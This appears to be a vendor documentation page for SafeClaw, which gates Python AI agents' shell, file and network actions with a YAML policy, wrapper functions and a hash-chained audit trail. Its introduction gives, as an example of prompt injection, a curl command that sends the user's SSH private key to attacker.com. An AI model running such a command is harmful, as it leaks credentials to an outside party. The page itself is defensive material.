AI Agent Safety for Python Developers
SafeClaw by Authensor gives Python developers deny-by-default action gating for AI agents. Every subprocess.run(), open(), requests.get(), and os.remove() call is intercepted and checked against your YAML policy before execution. Install it in seconds with npx @authensor/safeclaw and wrap your Python agent's dangerous operations with a single gate call.
Why Python Agents Need Gating
Python is the dominant language for AI agent development. Libraries like LangChain, CrewAI, and AutoGen all run in Python, and all of them can invoke shell commands, read files, install packages, and make HTTP requests. Without gating, a prompt injection can turn subprocess.run(["pip", "install", "legit-package"]) into subprocess.run(["curl", "attacker.com/exfil", "-d", "@~/.ssh/id_rsa"]).
SafeClaw's 446-test suite validates every gate decision. The hash-chained audit trail logs every action request, decision, and context — tamper-proof by design.
Installation
npx @authensor/safeclaw
SafeClaw runs as a sidecar process. Your Python agent communicates with it over a local HTTP interface or Unix socket.
Define Your Policy
Create a safeclaw.policy.yaml in your project root:
version: 1
defaultAction: deny
rules:
  - action: file.read
    path:
      glob: "/app/data/**"
    decision: allow
  - action: file.write
    path:
      glob: "/app/output/**"
    decision: allow
  - action: process.exec
    command:
      startsWith: "python"
    decision: allow
  - action: process.exec
    command:
      startsWith: "pip install"
    decision: prompt   # require human approval
  - action: network.request
    host:
      in: ["api.openai.com", "api.anthropic.com"]
    decision: allow
  - action: network.request
    decision: deny     # block all other outbound
Integrate with Your Python Agent
Use SafeClaw's gate check before any dangerous operation:
import subprocess
from urllib.parse import urlparse

import requests
from safeclaw import Gate

gate = Gate()  # connects to the local SafeClaw sidecar


def safe_exec(command: list[str], cwd: str = ".") -> str:
    """Execute a shell command only if SafeClaw approves."""
    decision = gate.check({
        "action": "process.exec",
        "command": " ".join(command),  # string form for the policy's startsWith matcher
        "cwd": cwd,
    })
    if decision.allowed:
        # Run the argument list directly (no shell), so what was gated is what executes.
        result = subprocess.run(command, capture_output=True, text=True, cwd=cwd)
        return result.stdout
    raise PermissionError(f"SafeClaw denied: {decision.reason}")


def safe_read(filepath: str) -> str:
    """Read a file only if SafeClaw approves."""
    decision = gate.check({
        "action": "file.read",
        "path": filepath,
    })
    if decision.allowed:
        with open(filepath, "r") as f:
            return f.read()
    raise PermissionError(f"SafeClaw denied: {decision.reason}")


def safe_request(url: str, method: str = "GET", **kwargs) -> requests.Response:
    """Make an HTTP request only if SafeClaw approves."""
    host = urlparse(url).hostname  # the policy's network rules match on host
    decision = gate.check({
        "action": "network.request",
        "host": host,
        "url": url,
        "method": method,
    })
    if decision.allowed:
        return requests.request(method, url, **kwargs)
    raise PermissionError(f"SafeClaw denied: {decision.reason}")
Gating pip install
Agents frequently try to install packages. Gate this explicitly:
def safe_pip_install(package: str) -> str:
    """Install a pip package only with human approval."""
    decision = gate.check({
        "action": "process.exec",
        "command": f"pip install {package}",
    })
    if decision.allowed:
        result = subprocess.run(
            ["pip", "install", package],
            capture_output=True, text=True,
        )
        return result.stdout
    raise PermissionError(f"SafeClaw denied pip install {package}: {decision.reason}")
With the policy above, this triggers a prompt decision — SafeClaw pauses execution and asks a human to approve or deny the install.
Audit Trail
Every gate check is logged to SafeClaw's hash-chained audit trail:
{
  "timestamp": "2026-02-13T10:23:01Z",
  "action": "process.exec",
  "command": "pip install numpy",
  "decision": "prompt",
  "approved_by": "operator@company.com",
  "hash": "a3f8c1...",
  "prev_hash": "9b2d7e..."
}
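The value of a hash-chained log is that a verifier can tell whether any entry was altered or removed after the fact. The following is an added example written for this page, not SafeClaw's implementation: it assumes a chain in which each entry's `hash` is SHA-256 over the canonical JSON of the entry (including its `prev_hash`), with a fixed all-zero genesis value for the first entry. The sample entries are constructed to mirror the fields shown above; the real format and hashing scheme may differ.

```python
# Added example (not SafeClaw's code): an append-only, hash-chained audit trail
# and a verifier that reports the first entry at which the chain breaks.
# Hashing scheme is an assumption: hash = sha256(canonical JSON of entry minus "hash").
import copy
import hashlib
import json
from typing import Any, Optional

GENESIS_HASH = "0" * 64  # assumed prev_hash for the first entry


def canonical(entry: dict[str, Any]) -> bytes:
    """Deterministic serialization so the same record always hashes the same way."""
    return json.dumps(entry, sort_keys=True, separators=(",", ":")).encode("utf-8")


class AuditTrail:
    def __init__(self) -> None:
        self.entries: list[dict[str, Any]] = []

    def append(self, record: dict[str, Any]) -> dict[str, Any]:
        """Link a new record to the previous entry and seal it with its own hash."""
        prev_hash = self.entries[-1]["hash"] if self.entries else GENESIS_HASH
        body = dict(record, prev_hash=prev_hash)
        entry = dict(body, hash=hashlib.sha256(canonical(body)).hexdigest())
        self.entries.append(entry)
        return entry


def verify(entries: list[dict[str, Any]]) -> tuple[bool, Optional[int]]:
    """Walk the chain; return (True, None) if intact, else (False, index of first bad entry)."""
    expected_prev = GENESIS_HASH
    for index, entry in enumerate(entries):
        if entry.get("prev_hash") != expected_prev:
            return False, index  # a gap or reordering: the link to the predecessor is broken
        body = {k: v for k, v in entry.items() if k != "hash"}
        if hashlib.sha256(canonical(body)).hexdigest() != entry.get("hash"):
            return False, index  # contents changed after sealing
        expected_prev = entry["hash"]
    return True, None


# Constructed sample records mirroring the fields of the JSON entry above.
SAMPLE_RECORDS = [
    {"timestamp": "2026-02-13T10:22:40Z", "action": "file.read",
     "path": "/app/data/reports/q1.csv", "decision": "allow"},
    {"timestamp": "2026-02-13T10:23:01Z", "action": "process.exec",
     "command": "pip install numpy", "decision": "prompt",
     "approved_by": "operator@company.com"},
    {"timestamp": "2026-02-13T10:23:15Z", "action": "network.request",
     "host": "example.com", "decision": "deny"},
]


def build_sample_trail() -> AuditTrail:
    trail = AuditTrail()
    for record in SAMPLE_RECORDS:
        trail.append(record)
    return trail


def tamper_demo() -> dict[str, tuple[bool, Optional[int]]]:
    """Show what the verifier reports for an intact chain and for two kinds of tampering."""
    trail = build_sample_trail()

    modified = copy.deepcopy(trail.entries)
    modified[1]["decision"] = "allow"      # rewrite a 'prompt' decision to look pre-approved

    deleted = copy.deepcopy(trail.entries)
    del deleted[1]                         # drop the entry for the install entirely

    return {
        "intact": verify(trail.entries),
        "modified_entry": verify(modified),
        "deleted_entry": verify(deleted),
    }


if __name__ == "__main__":
    for scenario, result in tamper_demo().items():
        print(f"{scenario:15} -> {result}")
```

Note that the chain only detects tampering; it does not prevent someone with write access from rewriting every later hash as well. That is why the last hash (or a periodic checkpoint of it) should be stored somewhere the agent host cannot write, such as a separate log collector, so an attacker who rewrites the whole chain still cannot make it agree with the anchored value.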
This works with both Claude (via Claude Agent SDK, MCP) and OpenAI (Assistants API, function calling). SafeClaw is provider-agnostic and MIT licensed.
Cross-References
- Deny-by-Default Explained
- Hash-Chained Audit Trails Deep Dive
- LangChain Integration Guide
- FastAPI Integration
- Django Integration
Try SafeClaw
Action-level gating for AI agents. Set it up in your browser in 60 seconds.
$ npx @authensor/safeclaw